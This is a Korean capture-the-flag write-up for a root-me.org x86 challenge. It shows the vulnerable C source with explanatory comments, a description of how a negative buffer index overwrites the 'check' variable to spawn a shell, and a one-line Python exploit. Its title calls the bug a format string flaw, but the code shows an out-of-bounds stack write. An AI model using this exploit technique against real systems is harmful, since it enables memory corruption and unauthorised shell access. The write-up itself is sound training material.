root-me.org [APP - SYSTEM]
ELF x86 - Format string bug basic 3 풀이
문제 소스 :
/* gcc -m32 -o ch16 ch16.c */
#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

/* NOTE(review): system() is called in shell() but <stdlib.h> is not among
 * the includes above, so that call relies on an implicit declaration. */
void shell(void);

/*
 * Challenge program: reads stdin one byte at a time into a 64-byte stack
 * buffer, using `count` as the write index, and calls shell() once `check`
 * equals 0xbffffabc.
 *
 * Root cause of the memory corruption, as visible in this listing:
 *   - `count` is a signed int that is decremented without a lower bound and
 *     incremented without an upper bound, and is then used unchecked as the
 *     index in `buffer[count] = i`.
 *   - `check` is never initialised or assigned anywhere in the program, so
 *     the comparison only becomes true if its storage is changed some other
 *     way.
 * A corrected version would refuse the decrement when count is 0 and stop
 * storing once count reaches sizeof buffer.
 */
int main()
{
  char buffer[64];
  int check;        /* read below without ever being written by this code */
  int i = 0;        /* zero-initialised; read() below overwrites one byte of it */
  int count = 0;    /* index into buffer; signed, so it can go negative */

  printf("Enter your name: ");
  fflush(stdout);
  /* No exit condition: the loop keeps running even after shell() returns. */
  while(1)
    {
      /* Only prints a message; it does not stop the loop or clamp count,
       * so the default branch can still store at index 64 and beyond. */
      if(count >= 64)
        printf("Oh no...Sorry !\n");
      /* NOTE(review): whether buffer[-4..-1] aliases check depends on how
       * the compiler lays out the locals; the write-up assumes check sits
       * directly below buffer - confirm for the actual build. */
      if(check == 0xbffffabc)
        shell();
      else
        {
          /* Return value is ignored: on EOF or error `i` keeps its previous
           * value and the switch runs again on stale data. Only one byte of
           * the int is written (the low byte on this x86 -m32 target). */
          read(fileno(stdin),&i,1);
          switch(i)
            {
            case '\n':
              printf("\a");
              break;
            case 0x08:
              /* Backspace: no `count > 0` guard, so count can drop below 0. */
              count--;
              printf("\b");
              break;
            case 0x04:
              printf("\t");
              count++;
              break;
            case 0x90:
              printf("\a");
              count++;
              break;
            default:
              /* Unchecked store: count may be negative or >= 64 here, which
               * writes outside buffer. */
              buffer[count] = i;
              count++;
              break;
            }
        }
    }
}

/* Spawns /bin/dash through system(); reached only from the check test in main(). */
void shell(void)
{
  system("/bin/dash");
}
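40행(case 0x08 분기)의 count--; 에는 하한 검사가 없어서 count가 음수가 될 수 있다. 이를 이용해 count를 -4까지 내린 뒤, default 분기의 buffer[count] = i; 로 check 자리에 0xbffffabc를 한 바이트씩 넣어주면 된다.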
check[0] check[1] check[2] check[3]
buffer[-4] buffer[-3] buffer[-2] buffer[-1] buffer[0] buffer[1] ....
exploit
(python -c 'print "\x08"*4+"\xbc\xfa\xff\xbf"'; cat) | ./ch16